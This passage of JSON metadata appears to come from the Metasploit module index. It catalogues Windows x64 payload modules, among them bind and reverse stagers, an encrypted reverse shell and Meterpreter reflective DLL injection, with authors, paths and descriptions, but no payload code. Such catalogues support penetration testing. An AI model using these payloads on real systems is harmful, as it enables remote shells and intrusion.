"payload/windows/x64/custom/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Custom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/custom/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - 
"payload_windows/x64/custom/bind_named_pipe": { - "name": "Windows shellcode stage, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/windows/x64/custom/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "UserExistsError" - ], - "description": "Custom shellcode stage.\n\nListen for a pipe connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/x64/custom/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_windows/x64/custom/bind_tcp": { - "name": "Windows shellcode stage, Windows x64 Bind TCP Stager", - "fullname": "payload/windows/x64/custom/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "sf " - ], - "description": "Custom shellcode stage.\n\nListen for a connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/custom/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp" - 
}, - "payload_windows/x64/custom/bind_tcp_rc4": { - "name": "Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/x64/custom/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/x64/custom/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_windows/x64/custom/bind_tcp_uuid": { - "name": "Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/windows/x64/custom/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Custom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/custom/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 
2, - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_windows/x64/custom/reverse_http": { - "name": "Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/windows/x64/custom/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "OJ Reeves" - ], - "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb", - "is_install_path": true, - "ref_name": "windows/x64/custom/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_windows/x64/custom/reverse_https": { - "name": "Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/windows/x64/custom/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "agix", - "rwincey" - ], - "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb", - "is_install_path": true, - "ref_name": "windows/x64/custom/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - 
"notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_windows/x64/custom/reverse_named_pipe": { - "name": "Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/windows/x64/custom/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "OJ Reeves" - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/x64/custom/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_windows/x64/custom/reverse_tcp": { - "name": "Windows shellcode stage, Windows x64 Reverse TCP Stager", - "fullname": "payload/windows/x64/custom/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "sf " - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/custom/reverse_tcp", - "check": false, 
- "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_windows/x64/custom/reverse_tcp_rc4": { - "name": "Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/x64/custom/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/x64/custom/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_windows/x64/custom/reverse_tcp_uuid": { - "name": "Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/windows/x64/custom/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": 
"/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/custom/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_windows/x64/custom/reverse_winhttp": { - "name": "Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/windows/x64/custom/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "OJ Reeves" - ], - "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_winhttp.rb", - "is_install_path": true, - "ref_name": "windows/x64/custom/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_windows/x64/custom/reverse_winhttps": { - "name": "Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/windows/x64/custom/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "OJ Reeves" - ], - "description": "Custom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - 
"autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_winhttps.rb", - "is_install_path": true, - "ref_name": "windows/x64/custom/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_windows/x64/encrypted_shell/reverse_tcp": { - "name": "Windows Command Shell, Encrypted Reverse TCP Stager", - "fullname": "payload/windows/x64/encrypted_shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Matt Graeber", - "Shelby Pace" - ], - "description": "Spawn a piped command shell (staged).\n\nConnect to MSF and read in stage", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/encrypted_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/encrypted_shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/encrypted_shell", - "stager_refname": "windows/x64/encrypted_reverse_tcp" - }, - "payload_windows/x64/encrypted_shell_reverse_tcp": { - "name": "Windows Encrypted Reverse Shell", - "fullname": "payload/windows/x64/encrypted_shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Matt Graeber", - "Shelby Pace" - ], - "description": "Connect back to attacker and spawn an encrypted command shell", - "references": [], - "platform": 
"Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/x64/encrypted_shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/encrypted_shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/exec": { - "name": "Windows x64 Execute Command", - "fullname": "payload/windows/x64/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf " - ], - "description": "Execute an arbitrary command (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/x64/exec.rb", - "is_install_path": true, - "ref_name": "windows/x64/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/loadlibrary": { - "name": "Windows x64 LoadLibrary Path", - "fullname": "payload/windows/x64/loadlibrary", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "scriptjunkie", - "sf " - ], - "description": "Load an arbitrary x64 library path", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/x64/loadlibrary.rb", - "is_install_path": true, - "ref_name": "windows/x64/loadlibrary", - "check": false, - "post_auth": false, - 
"default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/messagebox": { - "name": "Windows MessageBox x64", - "fullname": "payload/windows/x64/messagebox", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "pasta " - ], - "description": "Spawn a dialog via MessageBox using a customizable title, text & icon", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/x64/messagebox.rb", - "is_install_path": true, - "ref_name": "windows/x64/messagebox", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/meterpreter/bind_ipv6_tcp": { - "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/windows/x64/meterpreter/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_windows/x64/meterpreter/bind_ipv6_tcp_uuid": { - "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_windows/x64/meterpreter/bind_named_pipe": { - "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager", - "fullname": "payload/windows/x64/meterpreter/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "UserExistsError" - ], - "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_windows/x64/meterpreter/bind_tcp": { - "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager", - "fullname": "payload/windows/x64/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_windows/x64/meterpreter/bind_tcp_rc4": { - "name": "Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/x64/meterpreter/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_windows/x64/meterpreter/bind_tcp_uuid": { - "name": "Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/windows/x64/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_windows/x64/meterpreter/reverse_http": { - "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/windows/x64/meterpreter/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_windows/x64/meterpreter/reverse_https": { - "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/windows/x64/meterpreter/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "agix", - "rwincey" - ], - "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_windows/x64/meterpreter/reverse_named_pipe": { - "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/windows/x64/meterpreter/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_windows/x64/meterpreter/reverse_tcp": { - "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager", - "fullname": "payload/windows/x64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_windows/x64/meterpreter/reverse_tcp_rc4": { - "name": "Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/x64/meterpreter/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_windows/x64/meterpreter/reverse_tcp_uuid": { - "name": "Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/windows/x64/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). 
